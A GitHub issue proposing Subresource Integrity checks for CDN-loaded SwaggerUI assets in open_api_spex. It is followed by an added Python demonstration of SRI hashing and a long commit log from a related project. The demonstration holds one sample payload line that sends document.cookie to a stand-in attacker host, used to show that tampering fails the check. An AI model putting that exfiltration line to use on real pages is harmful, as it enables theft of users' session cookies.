Adding "integrity" to CDN-based resources (JS/CSS), thoughts? #559

Open
thbar opened this issue Aug 28, 2023 · 0 comments

Comments

@thbar
Contributor

thbar commented Aug 28, 2023

While checking the version of SwaggerUI I noticed that the plug which specifies the JS/CSS resources relies on a CDN, but the integrity (https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity) is not currently checked:

<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/swagger-ui/4.14.0/swagger-ui.css" >

<script src="https://cdnjs.cloudflare.com/ajax/libs/swagger-ui/4.14.0/swagger-ui-bundle.js" charset="UTF-8"> </script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/swagger-ui/4.14.0/swagger-ui-standalone-preset.js" charset="UTF-8"> </script>

In case of resource compromise on the CDN, this would allow arbitrary execution of JS on the main Phoenix app (since the plug is, most of the time I think, served from the same domain).

It would be worthwhile to add integrity to the resource (see https://stackoverflow.com/a/49061277/20302).

I wonder if a more flexible approach to let version/integrity be provided by the user of OpenAPISpex could be better.

Let me know what you think!

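As an added illustration of the Subresource Integrity check the issue asks for (example code, not part of the issue or of open_api_spex), the block below computes the `integrity` token for each asset, renders the `<link>`/`<script>` tags with `integrity` and `crossorigin="anonymous"` set, and then re-implements the browser-side comparison to show that a single appended byte (a stand-in for a CDN compromise) makes the check fail. The file contents are constructed placeholders, not the real swagger-ui assets; the CDN base URL is the one quoted in the issue. A plug generating the HTML in Elixir would do the same digest with `:crypto.hash(:sha384, data) |> Base.encode64()`.

```python
import base64
import hashlib
from html import escape

# Constructed sample contents standing in for the CDN-served files (not the real swagger-ui assets).
SAMPLE_ASSETS = {
    "swagger-ui.css": b".swagger-ui { font-family: sans-serif; }\n",
    "swagger-ui-bundle.js": b"window.SwaggerUIBundle = function () { return {}; };\n",
}

# Base URL quoted in the issue; pinning the version is what makes the digest stable.
CDN_BASE = "https://cdnjs.cloudflare.com/ajax/libs/swagger-ui/4.14.0/"

# Algorithms browsers accept for SRI, weakest to strongest.
SUPPORTED_ALGOS = ("sha256", "sha384", "sha512")


def sri_digest(data: bytes, algo: str = "sha384") -> str:
    """Return the SRI token '<algo>-<base64 digest>' for data (sha384 is the usual choice)."""
    if algo not in SUPPORTED_ALGOS:
        raise ValueError(f"unsupported SRI hash algorithm: {algo}")
    digest = hashlib.new(algo, data).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(data: bytes, integrity: str) -> bool:
    """Mimic the browser check on a fetched response body.

    The integrity attribute may hold several space-separated tokens. Tokens with an
    unrecognized algorithm are ignored; among the rest the strongest algorithm is
    selected and the body passes if it matches any token of that algorithm. A list
    with no recognized token is treated as if no integrity had been set.
    """
    by_algo: dict[str, list[str]] = {}
    for token in integrity.split():
        algo, sep, b64 = token.partition("-")
        if sep and algo in SUPPORTED_ALGOS:
            by_algo.setdefault(algo, []).append(b64.split("?", 1)[0])  # drop optional ?options
    if not by_algo:
        return True
    strongest = max(by_algo, key=SUPPORTED_ALGOS.index)
    actual = base64.b64encode(hashlib.new(strongest, data).digest()).decode("ascii")
    return actual in by_algo[strongest]


def render_tag(name: str, data: bytes, algo: str = "sha384") -> str:
    """Render the <link>/<script> tag with integrity and crossorigin attributes.

    crossorigin="anonymous" is required for SRI on a cross-origin resource: without a
    CORS-enabled response the browser cannot read the bytes to hash them and treats
    the load as failed.
    """
    url = escape(CDN_BASE + name, quote=True)
    token = sri_digest(data, algo)
    if name.endswith(".css"):
        return (f'<link rel="stylesheet" type="text/css" href="{url}" '
                f'integrity="{token}" crossorigin="anonymous">')
    return (f'<script src="{url}" integrity="{token}" '
            f'crossorigin="anonymous" charset="UTF-8"></script>')


def render_all() -> list[str]:
    """Tags for every sample asset, in dictionary order (CSS first, then the bundle)."""
    return [render_tag(name, data) for name, data in SAMPLE_ASSETS.items()]


if __name__ == "__main__":
    for tag in render_all():
        print(tag)
    # Simulate a CDN compromise: appending a payload changes the digest, so the browser
    # refuses to execute the script instead of running the injected code.
    original = SAMPLE_ASSETS["swagger-ui-bundle.js"]
    tampered = original + b"fetch('https://attacker.invalid/?c=' + document.cookie);\n"
    integrity = sri_digest(original)
    print("original passes:", verify_sri(original, integrity))
    print("tampered passes:", verify_sri(tampered, integrity))
```

In practice the token is computed once against the exact bytes of the pinned version (`openssl dgst -sha384 -binary file | openssl base64 -A` gives the same value) and committed alongside the version string, which is why letting the user of the library supply version and integrity together, as the issue suggests, keeps the two from drifting apart.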
thbar added a commit to etalab/transport-site that referenced this issue Aug 28, 2023
github-merge-queue bot pushed a commit to etalab/transport-site that referenced this issue Sep 4, 2023
* Change case to reflect current branding

* Improve description

* Fix AOM API schema (#3350)

* Run mix format

* Fix community_resources.updated

* Fix more datasets spec

* Update schemas.ex

* Fix format

* Add assert_schema on datasets list operation

* Fix /api/datasets specification

We now properly report the response to be an array of Datasets, instead of a single Dataset.

* Rename operation response (unsure of the impact)

* Update documentation for datasets operation

* Add more assert_schema

* Achieve more assert schemas

* Fix Dialyzer issues (#3397)

* Fix credo warning

* Add missing data required for API output

See:
- #3396
- #3399

* Make .aom.siren officially nullable

See:
- #3396

This will fix tests and make sure to reflect the actual production data.

* Group operations together on the swagger UI

* Update doc to reflect reality

* Add TODO

* Add one aom test at least

* Fix test

* Fix & modernize AOM specs (#3401)

* Start fixing Resource & CommunityResource specs

* Fix Autocomplete spec & add assert_schema

* Start fixing Dataset spec

* Update stats_controller_test.exs

* Add notes about conversions

* Add TODO

* Remove unused import

* Add TODO

* Add req in dev for scripting

Required because I now run some scripts with `mix run` to get the full app env.

* Format

* Create .gitignore

* Format

* Remove sometimes unseen field to reflect API behaviour

* Format

* Format

* Format

* Add missing schema_version

* Format

* Format

* Temporarily allow community resources here (#3407)

* Start fixing CoveredArea (just country case for now)

* Save WIP script used to validate current production data against local OpenAPI spec

* Remove TODO

* Add CoveredArea.Region and CoveredArea.AOM

* Advertise behaviour #3408

* Add CoveredArea.Cities

* Enforce type value for covered areas

* Enforce type field value for Region

* Remove bogus property

* Format

* Fix broken cities schema

* Refactor dataset spec

Improvements:
- extract spec so that history is not allowed in the summarized view
- make all keys required with an opt-out option

* Emphasize this specific response is summarized a bit

* Remove all "nullable: false" (since this is the default)

* Introduce summarized vs detailed Resource

* Improve GeoJSON / NeTEx checks

* Set properties for community & regular resources

* Format

* Remove todo (won't do that)

* Fix optional properties

* Download all the datasets JSON

* Improve dataset details spec

* Remove TODO

* Verify Resource properties

* Allow direct "./scripts/api/spec_check.exs" invocation from shell

* Increase timeout

* Refactor tests for clarity

* Disable highlight to fix SwaggerUI hanging in browser on large payloads (#3421)

* Add note about SwaggerUI version

See open-api-spex/open_api_spex#559

* Add useful links

* Mix format

* Add obsolete note

* Fix wording

* Remove comment which applies everywhere

* Require all by default

* Improve factories for required data (for tests to pass)

Related:
- #3399

* Improve wording

* Fix broken specs

* Fix broken specs

* Fix broken assertion

* Fix broken spec

* Add extra assert_schema

* Apply routing related match error fix

* Enforce additionalProperties: false for all detected schemas with type object

* Run mix format

* DRY optional keys & remove TODO

* Fix credo warning

* Fix credo warning

* Fix credo warning

* Fix typo

* Start verifying feature collections

* Allow extra property for GeometryBase

* Remove unused import

* Fix (I think) Polygon to make tests pass

* Move id to the right place

* Add missing type

* DRY things a bit

* Add quiet TODO

* Add note

* Remove TODO (this is not correct)

* Add note

* Specify history & remove TODO

* Remove TODO (will put it in the description of the PR)

* Fix incorrect note

* Fix broken link

* Add note

* Update schemas.ex

* Mix format

* Improve texts

* Mix format

* Update apps/transport/lib/transport_web/api/controllers/places_controller.ex

Co-authored-by: Antoine Augusti <antoine.augusti@transport.data.gouv.fr>

* Update apps/transport/lib/transport_web/api/schemas.ex

Co-authored-by: Antoine Augusti <antoine.augusti@transport.data.gouv.fr>

* Update apps/transport/lib/transport_web/api/schemas.ex

Co-authored-by: Antoine Augusti <antoine.augusti@transport.data.gouv.fr>

* Update apps/transport/test/support/factory.ex

Co-authored-by: Antoine Augusti <antoine.augusti@transport.data.gouv.fr>

* Update apps/transport/test/transport_web/controllers/api/schemas_test.exs

Co-authored-by: Antoine Augusti <antoine.augusti@transport.data.gouv.fr>

* Update apps/transport/test/transport_web/controllers/api/schemas_test.exs

Co-authored-by: Antoine Augusti <antoine.augusti@transport.data.gouv.fr>

* Update apps/transport/lib/transport_web/api/spec.ex

Co-authored-by: Antoine Augusti <antoine.augusti@transport.data.gouv.fr>

* Add note

* Update apps/transport/test/transport_web/controllers/api/stats_controller_test.exs

Co-authored-by: Antoine Augusti <antoine.augusti@transport.data.gouv.fr>

* Fix broken test

---------

Co-authored-by: Antoine Augusti <antoine.augusti@transport.data.gouv.fr>